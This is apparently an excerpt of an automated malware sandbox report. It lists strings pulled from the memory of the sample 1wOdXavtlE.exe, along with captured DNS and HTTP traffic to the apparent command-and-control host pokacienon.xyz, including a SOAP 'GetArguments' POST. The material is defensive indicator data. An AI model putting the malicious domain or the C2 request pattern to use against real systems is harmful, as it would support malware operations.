","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000F.00000003.442380240.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\n*Calls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":137845484,"PackageFormat":"Appx","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","MainPackageFamilyNameForDlc":null,"PackageFullName":"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt","PackageId":"9f0b5036-3839-33f0-1d64-45190b6cc3d7-X64","PackageRank":30002,"PlatformDependencies":[{"MaxTested":2814750970478592,"MinVersion":2814750438195200,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"FACEBOOK.317180B0BB486_950.7.118.0_x64__8xx8rvfyw5nnt\",\"content.productId\":\"3219d30d-4a23-4f58-a91c-c44b04e6a0c7\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750970478592,\"platform.minVersion\":2814750438195200,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Social\",\"optOut.backu

Source: unknown

DNS traffic detected: queries for: pokacienon.xyz

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: pokacienon.xyzContent-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.531321702.0000000008140000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: svchost.exe, 0000000F.00000002.465244340.00000221A3B00000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/Di
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: svchost.exe, 0000000F.00000002.465143551.00000221A38D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: 1wOdXavtlE.exe, 00000002.00000003.475742441.0000000008AA0000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000003.402274130.0000000008A91000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: 1wOdXavtlE.exe, 00000002.00000003.475742441.0000000008AA0000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000003.402274130.0000000008A91000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: 1wOdXavtlE.exe, 00000002.00000003.475742441.0000000008AA0000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000003.402274130.0000000008A91000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000002.465143551.00000221A38D0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://pokacienon.xyz
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://pokacienon.xyz/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://pokacienon.xyz:80/
Source: 1wOdXavtlE.exe, 00000002.00000002.486054377.0000000002DFF000.00000004.00000001.sdmp	String found in binary or memory: http://pokacienon.xyzdr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: http://s3-1-w.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/BrowserExtension.Objects.Enums
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
